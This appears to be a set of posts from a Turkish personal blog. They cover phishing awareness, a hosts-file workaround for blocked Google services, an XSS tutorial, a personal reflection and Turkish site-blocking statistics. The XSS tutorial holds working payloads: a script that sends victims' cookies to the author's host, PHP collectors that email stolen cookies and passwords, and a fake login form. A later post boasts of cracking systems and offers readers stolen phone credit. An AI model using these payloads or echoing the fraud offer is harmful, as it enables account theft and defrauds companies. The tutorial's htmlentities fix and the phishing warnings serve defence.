Phishing en çok mail ve anlık mesajlaşmayla hedefe ulaşır. Bu yüzden özellikle maillerinizdeki bağlantıları kontrol etmeden açmayın. Ayrıca az da olsa telefonla da saldırı yapılabilir. Bir bankanın müşteri temsilcisi olarak sizi arayabilirler, bilgilerinizi sorabilirler. Bunu da anlamanın en iyi yolu sizi arayan temsilcinin hangi numaradan aradığıdır. Eğer bankanızın telefon numarası 444 0 444 ise ve bu numaradan bir çağrı geliyorsa güvenli bi şekilde bilgilerinizi verebilirsiniz. Ama bunun yerine sizinle 0216 *** ** **’lı bir numarayla, başka bir şehrin telefon koduyla veya cep telefonu numarasıyla ulaşmak isterlerse güvenmemenizi tavsiye ederim. Çünkü genelde gerçeği yansıtmayan kişiler tarafından kullanılır bu tür numaralar. Böyle numaralardan gelen aramalarda müşteri temsilcisi hangi bankadaysa, onun 444′lü numaradan veya sizin bildiğiniz banka numarasından sizi aramasını isteyebilirsiniz. Yine de bildiğim kadarıyla çoğu banka İstanbul alan koduyla müşterilerine ulaşıyor. Bu da bu tehlikeyi açıkca banka müşterilerine sunuyor.

Phishing ilk olarak 2 Ocak 1996′da Amerika’da ortaya çıkmıştır. Ayrıca; Phishing yüzünden ABD’de Mayıs 2004 ila Mayıs 2005 arasında 1.2 milyon bilgisayar kullanıcısı zarara uğramış ve toplam 929 Milyon Dolar kaybetmişlerdir, bu da şirketlere 2 milyar dolara yakın bir zarar teşkil etmiştir. İngiltere’de 2004′de 12.2 Milyon paund olan banka dolandırıcılığı, 2005′de 23.2 milyon paunda çıkmıştır.

Phishing Saldırısında Kurbana Gönderilen Mail Örneği

Bu genelde mail yoluyla saldırgan tarafından gizli link olarak yutturulmaya çalışılır. Fazla detaya girip kafanızı karıştırmak istemiyorum. Bir örnek herşeyi anlatır.

Bankadan gelen bir mail;

Güvenlik Alarmı

Facebook hesabınızın hizmet süresi dolmak üzeredir.

Aşağıdaki linki kullanarak hesabınıza ulaşabilir ve hesabınızı tekrar aktif hale getirebilirsiniz.

https://www.facebook.com

© 2010 Facebook INC. – Her hakkı saklıdır.

Anlatmak istediğimi yukarıdaki facebook bağlantısına tıkladığınızda göreceksiniz. Çünkü bağlantı facebook anasayfası olarak gözüküyor ama aslında girdiğinizde sahte bir facebook sayfası göreceksiniz. Girdiğiniz bağlantıya kesinlikle gerçek facebook giriş bilgilerinizi yazmayın. Email kısmına aklınızdan gerçek olmayan bir mail adresi ve şifre alanına da bir şifre sallayın. Giriş’e tıklayın.

Sizi facebook.com anasayfasına yönlendirdi. Ama arkaplanda ne mi yaptı?

Buraya tıklayarak sonuca bakabilirsiniz.

Açılan sayfanın en sonuna giderek girmiş olduğunuz emaili ve şifreyi göreceksiniz. Bu yüzden her gelen maile inanmayın.

Türkiye’de fazla kullanılmadığı için bu konuda fazla da güvenlik tedbiri yok. Bu yüzden Türkiye’de oltaya düşecek internet kullanıcısı çok fazla ve bunun için bir önlem de alınmamış durumda.

Dünyada yaygın olarak saldırı alan şirketler:

1. JPMorgan Chase and Co.     -> 13.390
2. PayPal     ->     8.531
3. eBay Inc.     ->     420
4. Bank of America Co.     ->     360
5. Google     ->     206

Türkiye’den en çok saldırı alan şirketler:

1. Garanti Bankası
2. ING Bank
3. Hepsiburada
4. PayPal
5. Hotmail
6. Gmail
7. Facebook

Phishing has been around since the earlier days of the internet, from the late 90′s, when America Online began their boom. The idea has not changed much since its inception, send out bait to fool victims into giving away their credentials. With the internet being new, many users were naive and a well worded fake e-mail would be enough to have a user give away their password. It wasn’t long before the news media caught on and warned users not to give away their credentials, no matter how official the e-mail looked. To go back to my fishing analogy, it was time for the fishermen to throw away their sticks with ropes and upgrade to fishing rods with spinning reels.

Attack Methods – Websites

The brief e-mails that addressed masses was no longer the most effective way to trick a victim into giving up their credentials. It was time for the hackers and social engineers to evolve their attack methods. To this day, these same attacks are currently being used for phishing.

Fake Website

A domain name similar to a legitimate site is bought, and molded to look exactly like the real thing. The phisher then sends out messages, either by e-mail, instant messaging, Facebook messages, text messages, and so forth to fool a victim into clicking a link to the fake site. The unsuspecting victim logs in and their credentials logged.

Fake Pop-up

An evolution of the ‘Fake Website’ attack, when people became more aware of fake website attempts, the attack was evolved. A link was still sent, however, instead of linking to a fake website, it would link to the actual website. When the real website loads, a pop-up appears asking for the user’s credentials. The victim, seeing the legitimate site in the background would think the pop-up was from a legitimate source and enter their information. In reality, the pop-up would be the hacker’s tool to phish credentials.

Fake Website with Validation

Another evolution of the ‘Fake Website’ attack was to have the fake website verify the victim’s credentials with the real site. A victim would enter their credentials, the fake website would send the credentials to the real website and automatically validate whether the username and password is correct or not; saving the hacker’s time by having autovalidation.

Attack Methods – Social Networks

Social networks have expanded the attack vectors for hackers and social engineers. Going back to the fisherman analogy, the fishermen have gone from fishing in lakes and ponds to oceans and rivers.

Facebook

Facebook is one of the most popular social networking sites to arise. They’ve expanded what users can do on Facebook. The allowance of applications, and a new internal messaging system have opened up the floodgates. A victim could be surfing on Facebook when they receive a message from someone, linking to a site, usually shortened down to something simple such as ‘Vote for me!’ The victim clicks the link and lands on a login page that looks exactly like Facebook’s login page. The victim, thinking that this was a Facebook application for voting enters their credentials and gives away their username and password.

The Friend Search

Facebook and many other social networks offer a ‘Search for your friend’ option. The idea behind the system is for the social network to search your messaging contacts and check if their e-mails are in the system. A hacker could use the ‘Fake Pop-up’ method and have a ‘Find your friend on Facebook!’ pop-up when a victim clicks a link to Facebook. The pop-up asks for the victim’s primary e-mail and password, and when the victim fills in the form, they’ve given away their e-mail account.

Twitter

A recent addition to the internet world. Recently, hackers used Twitter and tweeted links to a fake version of the Twitter site. They used methods to shorten the real URL. On their tweet, they would put a shortened link with a comment to have curious victims click the link. When the victim clicked the link a fake Twitter site loaded. The victim puts in their credentials and gives away their password.

Phishing Attack Results

Most people assume that the most damaging attacks are usually the attacks where a victim gives away their bank account or credit card information. By all means, if a phishing attack manages to capture bank account and credit card information, its definitely a success but to a phisher, even small victories count.

Trusteer, a security firm found that 73% of of users on the web use their bank password for everything. The chances that a social network site’s password and the victim’s bank account password are the same is tremendous. Bank accounts, credit accounts, social network accounts, insurance accounts, and whatever else a phisher can access can also lead to them gathering enough information to steal a victim’s identity!

Phishing attacks are constantly evolving but the core method is still the same. I’ll revert back to my fisherman analogy. Fishermen can use the most high tech equipment such as spinning reels, laser sights, motion detectors, sonar, or they could use the most simplest technologies such as rods with strings, but the end goal is the same, send out bait and earn back a catch. Phishing is the exact same idea, they can use the most advanced attacks such as fake websites, and fake pop-ups or they use the most simplest method such as e-mails, but the end goal is to send out bait and hook in victims. The big difference being the catch.

Başlat > Çalıştır

Aşağıdaki dizin bilgisini sağ tıklayıp, kopyalayın ve “Çalıştır” hücresine yapıştırıp enterlayın.

C:\Windows\system32\drivers\etc\hosts

Karşınıza Birlikte Aç ekranı geldi, buradan Not Defteri’ni seçip, Tamam’a tıklayın.

Açılan dosyanın en alt satırına aşağıdaki giriş kodlarını kopyalayıp, yapıştırın.

74.125.43.103 docs.google.com
74.125.43.103 translate.google.com
74.125.43.103 code.google.com
74.125.43.103 pages.google.com
74.125.43.103 video.google.com
74.125.43.103 translate.google.com.tr
74.125.43.103 docs.google.com
74.125.43.103 sites.google.com
74.125.43.103 books.google.com
74.125.43.103 chrome.google.com
74.125.43.103 sketchup.google.com
74.125.43.103 froogle.google.com
74.125.43.103 labs.google.com
74.125.43.103 mars.google.com
74.125.43.103 moon.google.com
74.125.43.103 notebook.google.com
74.125.43.103 toolbar.google.com
74.125.43.103 browsersync.google.com
74.125.43.103 catalog.google.com
74.125.43.103 codesearch.google.com
74.125.43.103 dir.google.com
74.125.43.103 earth.google.com
74.125.43.103 groups.google.com.tr
74.125.43.103 shopping.google.com
74.125.43.103 sky.google.com
74.125.43.103 support.google.com
74.125.43.103 tools.google.com
74.125.43.103 wap.google.com
74.125.43.103 answers.google.com
74.125.43.103 google-analystics.com

Aşağıdaki resim gibi gözükmesi gerekiyor.

Kaydettikten sonra, rahatlıkla Google’ın servislerinden faydalanabilirsiniz.

Bir anda bu sitelere girmeme nedeni

Google yasaklandı şeklinde algılanan durum aslında bildiğimiz Youtube yasağından başka bir şey değildir. Youtube’un birçok farklı IP adresi kullanması ve ülkemizde mevcut olan yasağın DNS tabanlı engelleme olması nedeniyle mahkeme kararı tam anlamıyla uygulanamış sayılmıyordu. 31 Mayıs’ta aktif olan yeni uygulama ile erişim engelleme DNS tabanlı olmaktan çıkartılın IP bazlı olarak değiştirildi. TİB servis sağlayıcılara Youtube’un kullandığı kullandığı tüm ip adreslerinin bengellenmesi için yazı gönderdi ve böylece yasaklı sitelerin IP’leri tüm servis sağlayıcılar tarafından engellenmeye başlandı.

İşte sorun da tam bu noktada ortaya çıktı.
Zahmet edip de kendi hizmetleri için ayrı IP atamayan Google, ortak bir IP havuzundan hem kendi hizmetlerine hem de Youtube’a IP atıyor, böylece Youtube’un yasaklanan IP’leri Google servislerine de ait olduğu için otomatik olarak onlar da yasak kapsamına giriyor. Özellikle de 74 ve 209 ile başlayan IP adresleri sorunun temel kaynağını oluşturuyor. Google servislerine ulaşmaya çalışan kullanıcıyı 74 ya da 209 ile başlayan IP’ye yönlendiriyor ama tesadüf(!) bu ya Youtube’da aynı rakamlarala başlayan IP’leri kullanıyor.

Kısacası Google hizmetlerine getirilmiş resmi bir yasak yok. Kurunun yanında yaş da yanar misali, tabi ihmalin de büyük katkısıyla YouTube’un yasaklı IP’lerinden nasiplenen analytics, earth, docs gibi Google hizmetleri ister istemez yasak kapsamına giriyor. Haber Kaynağı: HaberTürk

Sizi bekleyen tehlikeler;

1. İstenmeyen e-posta
2. Rahatsız edici mesajlar
3. Kimlik hırsızlığı
4. Çocuk tacizi

Internet sizi ve ailenizi istenmeyen e-posta, anlık mesaj gibi rahatsız edici durumlara, kimlik hırsızlığı, çocuk tacizi gibi risklere ve bilgisayarınıza zarar verecek veya değerli verilerinizi yok edecek güvenlik tehditlerine maruz bırakabilir. İnternetle birlikte gelen riskler korunmayı gerektirir. En iyi korunma yolu güvenli internet hakkında kapsamlı ve sürekli bir eğitim almaktır.

Internet ortamında şiddet, pornografik içerik ve zararlı yayınlara karşı bilinçli olmak, tehlikeyi görmek, korunmayı bilmek, interneti yasaklamadan suç ve istismardan arındırabilmek çok önemlidir. Kendinizin, ailenizin, çocuğunuzun karşılaşabileceği riskleri bilmek ve bu riskleri nasıl azaltabileceğinizi ya da ortadan kaldırabileceğinizi öğrenmek çevrimiçinde daha güvende olmanızı sağlar.

HaberTürk ve Microsoft bu vesileyle internetin özgür ve güvenilir olması için ciddi bir girişim başlattı. İnternet nasıl özgür ve güvenilir kalır? En önemli sorumuz bu. Özellikle çocuklarımız kimlik hırsızlığı, uygunsuz görüntüler, taciz ve tehdit gibi belirli risklere karşı açık durumdalar. Alabileceğiniz basit teknolojik yardımlar ya da çocuğunuzla bu konuda kuracağınız farklı bir ilişki, biraz daha dikkatli olmak, bilgisayarınızla ilgili alacağınız ufak tefek önlemler karşılaşabileceğiniz büyük sorunları ortadan kaldıracaktır. Bir problemle karşılaştığınızda nereye başvuracağınızı bilmek de önemli bir ayrıntıdır.

Özellikle ailelere tavsiye ediyorum, çocuğunuz için bunları bilmenizde fayda var.

kaynak: guvenliinternet.org

1. XSS Nedir?
2. XSS Açığı Yaratma
3. Cookie Hırsızlığı
4. XSS Güvenliği
5. Saldırı Yöntemleri
6. Saldırıyı Filtreleme (Bypass)
7. XSS Upload
8. Phishing XSS

Bölüm #1| Xss Nedir?

(Vikipedi, Özgür Ansiklopedi)

Cross site scripting (XSS), bir bilgisayar güvenlik açığıdır. Saldırgan, HTML kodlarının arasına istemci tabanlı kod gömmesiyle, kullanıcının tarayıcısında istediği istemci tabanlı kodu çalıştırabilir.

Bölüm #2 | XSS Açığı Yaratma

notepad.exe’yi çalıştırın ve aşağıdaki kodu index.html olarak kaydedin.

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">






XSS Vulnerability by knbykl 



Ara:

Şimdi yeni bir notepad sayfası açın ve aşağıdaki kodları XSS.php olarak kaydedin.

< ! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Search result:
< /head>
< body>
Search result  : < ?php echo $_POST['Vulnerability']; ?> 
< /body>
< /html>

Uyarı mesajı aldıysak, bu aşama tamamdır.

Bölüm #3 | Cookie Hırsızlığı

Örnek olarak ziyaretçi defterlerini hedef seçebilirsiniz. Aşağıdaki kodu kullanmamız gerekiyor.

< script>
window. open("http://www.knbykl.org/cookie.php?cookies="+document.cookie);
< /script>

Notepad’de yeni bir sayfa açın ve cookie.php olarak kaydedin. Kayıt ettiğiniz belgeyi yukarıda belirtildiği gibi serverdaki dosyalarınızdaki doğru dizine yükleyin.

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Hata

< ? mail('email@example.com', 'Cookie stealed ! - thx knbykl :)', $cookies); ?>
< body>
Hata - Access denied for < ? echo $_SERVER["REMOTE_ADDR"]; ?>

Bölüm #4 | XSS Güvenliği

XSS açığını oluşturan hata, index.html olarak kaydettiğimiz kodların 16. satırında bulunuyor. Şimdi ufak bir düzenlemeyle XSS’nin oluşmasını engellemek için kodda nasıl bir değişiklik yapacağımızı (fixlemeyi) göreceğiz.

< body>
Arama Sonucu  : < ?php echo $_POST['Vulnerability']; ?> 
< /body>

aşağıdakiyle değiştirin.

< body>
Arama Sonucu  : < ?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?> 
< /body>

Bu fonksiyonları da bilmenizde fayda var;

other function:
htmlentities() quotes
strip_tags()

Bölüm #5 | XSS’de Saldırı Teknikleri

Resim dosyasıyla saldırı kodu:

<img src="http://knbykl.org/resim_xss.png">

Flash dosyasıyla saldırı kodu:

<embed src="http://knbykl.org/flash.swf">

Yeni bi sayfa açtırmak için gereken kod:

<script>window.open( "http://www.knbykl.org/own.html" )</script>

Hata sayfasına:

<meta http-equiv="refresh" content="0; url=http://knbykl.org/own.html" />

Bölüm #6 | Saldırıyı Filtreleme (Bypass)

XSS saldırı tekniklerinin diğer örneklerini görmek için buraya tıklayın.

Bölüm #7 | XSS Upload İşlemi

Biryerlerden resim bulun veya paintte birşeyler karalayıp bunu “resim.gif” adında kaydedin. Ardından;

resim.gif > Sağ tıkla > Birlikte Aç > Notepad

Yani resim.gif dosyamızı notepad ile açıp, içinde karmaşık ifadelerin  hepsini siliyoruz ;

ve bu kodu yapıştırıp, kaydederek XSS kodumuzu resim formatına dönüştürmüş oluyoruz.

.GIF formatında kaydettim ama sizler istediğiniz resim formatında kaydedebilirsiniz. Aşağıda bir kaç örnek kod yazdım.

PNG = ‰PNG
GIF = GIF89a
BMP = BMFÖ

Bölüm #8 | Phishing XSS

Phishing XSS, konusunda fazla detaya girmiyorum, zaten işin mantığını kavrayanlar “Phishing XSS’nin ne kadar tehlikeli olacağını anlayabilir.Test amaçlı üye giriş formu kodladım, onu örnek olarak kullanabilirsiniz. Kurban eğer kullanıcı adını ve şifresini girerse, bilgileri mail olarak adresinize gelecektir.

Kullanıcı adınızı ve şifrenizi girin:



Kullanıcı Adı:





Şifre:

Bunu da mail.php olarak kaydedip, serverınıza yükleyin.

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< html xmlns="http://www.w3.org/1999/xhtml">
< head>
< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
< title>Hata< /title>
< /head>
< ?php
$login = $HTTP_GET_VARS["login"];
$password = $HTTP_GET_VARS["password"];
mail("info@knbykl.org", "Cookie stealed ! - thx knbykl =)", $password , $login );
?>
< body>
Hata - Server Loading...

< /body>
< /html>

Not: Kodları bilgisayarınıza kaydettikten sonra düzeltmeniz gereken yerleri düzeltmezseniz, istediğiniz sonucu alamazsınız. Kodların hiçbirinde sorun yok, düzgün çalışıyor.

İnsanların ailesine, çevresine zaman ayırması gerektiğini her daim söylüyorum, ama bir de şu şekilde düşünüyorum. Peki ya ben?

Evet ben. Çevreme ve yakınımdakilere zaman ayırabiliyorum ama kendime ayıracak zaman bulamıyorum. İnsan öncelikle kendisine bakmalı, sorgulamalı;

• Ben neyim?
• Neden yaşıyorum?
• Şu anda ne yapıyorum?
• Benim yaşımda olan insanlar şu anda ne yapıyor?
• Ben yalnız mıyım?
• Yalnızsam neden yalnızım? Yalnız değilsem yanımdakiler kim?
• Hayat sadece internette gününün 20 saatini geçirmek mi?
• Hayat senin için neyi ifade ediyor?
• Eşine, çocuğuna değer veriyor musun?

işte aynen bu şekilde, kararlı ve dürüstçe. Başkası için değil, doğruları bulabilmek için kalbinden cevaplamalı bu soruları.

Bu soruları bir kağıda yazıp hepsini teker teker cevapladım, bir dahaki yazımda da cevaplarını aktarırım. Ben cevaplarımdan yola çıkarak White Angel temamı bloguma entegre ettim. Beyaz rengiyle, saflığı, temizliği ifade eden bir arayüz. Bakalım siz de beyaz yönünüzü bulabilecek misiniz?

İlk başlarda bir üyeliği ele geçirmeyle başlayan cracking işleminde 2 arkadaşımın da yardımıyla şu anda ayrı 3 sistemi yönetebiliyorum. Belki dolandırıcılığa giriyor ama “zenginden alıp, halka dağıtma” dedikleri şeyi uyguluyorum.

Sistemlerin belirli bir kredisi var, şu an yaklaşık eski parayla 4 milyar karşılığı kontör transfer hakkına sahibim. Bunu da sanırım en iyi dağıtmanın yolu bloguma yazmaktı. Herhangi bir suçlama yapamayacaklarının garantisini verebilirim, ayrıca parça kontör gelen numarayı da geri aramamalısınız.

Yapmanız gereken sadece yorum alanına telefon numaranızı ve hangi operatöre bağlı olduğunuzu belirtmek. 100 kontör ve üzeri de yükleme şansım var fakat sınırlama olarak 20 kontör ideal diye düşünüyorum, en azından daha fazla kişi yararlanmalı, belirli bir süreden sonra da bu miktarı 10 kontöre indirebilirim. Burayı kesinlikle bağımlılık haline getirmeyin, inanın bana bu insanlardan koparabildiğimiz kadarını koparmaya çalıştım, çünkü bahsettiğim kişiler ve firmalar insanları zehirlemek gibi pis işlerle de ilgileniyorlar.

Ayrıca yorum alanına numaranızı yazdığınız zaman, onaylanmadan gözükmeyeceği için, onaylarken de numaranızı gizleyeceğimden emin olabilirsiniz.

Black Hawk Safety Net’i daha önce duyanlarınız vardır. Ağdaki bilgisayarlara sızma, sistem açıklarından yararlanarak sistemi çökertme, bilgi hırsızlığı vb. konularda eğitimler veriyorlardı. Bu yüzden de Çin Bilişim Suçları Polisi grubun faaliyetlerini durdurmak için çalışmalar başlatmıştı. Bunu grup kendisi de açıklamıştı zaten.

Aslında herşey sitede bulunan 3 yöneticinin bilgisayarın nasıl çökertilmesi gerektiğini üyelerine öğretmesiyle başladı. Bu da Çin’de suç sayıldığı için geçen sene başladı soruşturma.

Polis;

• 1 otomobil
• 9 web sunucusu
• 5 bilgisayara

el koyduğunu açıkladı.

2005′te kurulan sitesinin 200 bine yakın üyesi var, bunların 15 bine yakını belirli ücret karşılığı özel hazırlanan hacking dökümanlarını alabilmek için 1.02 milyon abd doları para ödediler.

Erişime engellenen sitelerin yarısı 5651 sayılı İnternet Kanunu’nda sıralanan gerekçelerle kapatılırken, diğer yarısına erişim çoğunlukla MÜ-YAP’ın şikayeti üzerine 5864 sayılı Fikir ve Sanat Eserleri Kanunu Ek Madde 4 uyarınca engellendi.

• Mahkeme Kararı Yazanlar (5550)
• Mahkeme Kararı Yazmayanlar (550)
• Erişim Engeli Kaldırılanlar (26)
• Engellenen WordPress Blogları (17)
• Engellenen Blogger/Blogspot Blogları (29)

Not: Bu bilgiler 1 Şubat 2010 tarihinde alınmıştır

651 sayılı yasa uyarınca engellenen sitelerin büyük kısmı cinsel içeriği nedeniyle erişime kapatıldı. Onu bahis ve kumar oynatma ve teşvik etme, Atatürk aleyhine işlenen suçlar, uyuşturucuya teşvik etme, fuhuş da diğer gerekçeler arasında.